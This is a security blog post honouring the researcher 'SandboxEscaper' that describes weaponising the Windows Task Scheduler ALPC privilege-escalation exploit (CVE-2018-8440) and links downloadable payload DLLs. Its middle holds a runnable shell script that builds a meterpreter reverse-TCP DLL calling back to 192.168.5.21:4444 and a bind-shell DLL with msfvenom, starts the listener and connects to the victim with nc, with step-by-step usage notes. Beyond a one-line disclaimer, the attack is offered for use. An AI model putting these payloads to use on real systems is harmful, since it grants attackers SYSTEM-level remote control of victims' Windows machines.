SandboxEscaper Windows 0-Day Exploit payload Weaponised: Tribute
I am an experienced Vulnerability Researcher and Security Architect with 16+ years of experience in various verticals and horizontals, be it consumer electronics, semiconductors, automotive or others. I started as a software engineer on low-level embedded devices, writing everything from applications to kernel drivers on various operating systems, and then moved on to my real calling, i.e. hacking. I love to stick to the older golden days of game hacking, BBS, shareware, phreaking, Phrack, the virus era, metal music, cheats and many more such cool things from the underground. I wear many hats from time to time as necessary, but I also love to help people and organizations deal with the core cybersecurity issues rather than hand them a checklist with a presentation. Opinions and posts on my site are purely my own and do not reflect my work.

This is a tribute post to a researcher known as “SandboxEscaper”, who used to find Windows zero-days for breakfast; local privilege escalation (PE) was her speciality, among much else. I heard she went to work for MS after dropping tons of zero-days on Windows some 5-6 years ago. I was quite fascinated and intrigued by her. She was mentioned in quite a few articles and news posts at the time (here is one such example), so at the time I decided to weaponise one of her exploits, CVE-2018-8440 (the Windows Task Scheduler ALPC local privilege escalation), to deliver:

  • A bindshell

  • And a Reverse TCP

https://youtu.be/mV5I5Syc4rU

Bind Shell Payload Modification

https://youtu.be/epqsMWUyT60

Reverse TCP Payload Modification

  • Run the exploit as shown in the original video, or, for the weaponised version, as shown in my video, which can be downloaded from this gdrive.

  • The existing ALPC DLL is replaced with one carrying a weaponised payload, available below under Weaponised DLLs:

  1. Reverse TCP (the victim connects back to our meterpreter listener on 192.168.5.21:4444)

  2. Bind TCP shell (listens on port 4444 on the victim)
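As an added example (this is not code from the post, and the post does not say how its own DLLs were built), here is the attacker-side setup that matches the two payloads listed above: generating a reverse TCP and a bind TCP payload DLL with msfvenom, then starting the matching listener or connecting to the bound port. The IP and port are the post's own; everything else is assumed: Metasploit and netcat are installed, the target is 64-bit Windows (the payload DLL must match the bitness of the SYSTEM process that loads it), and the victim address is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post. Assumptions: Metasploit + nc installed,
# 64-bit Windows target, attacker box is 192.168.5.21, victim address is a placeholder.
set -e

LHOST=192.168.5.21
LPORT=4444
VICTIM="${VICTIM:-192.168.5.50}"   # assumed victim address, replace for your lab

# Echo the msfvenom arguments for one of the two payload variants from the post.
# The DLL is loaded by a SYSTEM process, so its bitness must match that process (x64 here).
payload_args() {
  case "$1" in
    reverse) echo "-p windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f dll -o reverse_tcp.dll" ;;
    bind)    echo "-p windows/x64/shell_bind_tcp LPORT=$LPORT -f dll -o bind_tcp.dll" ;;
    *)       echo "usage: payload_args reverse|bind" >&2; return 2 ;;
  esac
}

# Build one payload DLL; refuses cleanly when msfvenom is not on PATH.
build_dll() {
  command -v msfvenom >/dev/null || { echo "msfvenom not found" >&2; return 1; }
  # shellcheck disable=SC2046  (word splitting of the argument string is intended)
  msfvenom $(payload_args "$1")
}

# Reverse TCP: the handler must be up before the exploit runs or the connect-back is lost.
start_handler() {
  msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST $LHOST; set LPORT $LPORT; exploit -j"
}

# Bind shell: nothing to listen for on our side; connect to the victim after the exploit has run.
connect_bind() {
  nc -v "$VICTIM" "$LPORT"
}

case "${1:-}" in
  build)   build_dll reverse; build_dll bind ;;
  handler) start_handler ;;
  bind)    connect_bind ;;
  "")      : ;;   # no argument: only define the functions (safe to source)
  *)       echo "usage: $0 build|handler|bind" >&2; exit 2 ;;
esac
```

Run `sh weaponise.sh build` on the attacker box to produce both DLLs, start `sh weaponise.sh handler` before triggering the reverse TCP variant, and use `sh weaponise.sh bind` once the bind variant has executed on the victim. Port 4444 is reused for both variants exactly as in the post, so only run one at a time.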

Weaponised DLLs

sandboxescaper-zeroday-demo-with-weaponized-payload (Download)

weaponized-dlls (Download)

This is just a demo; do not actually weaponise it in the real world.

Hacking Tales From gh0stshell

Experiences of the past applied to today's CyberSecurity Context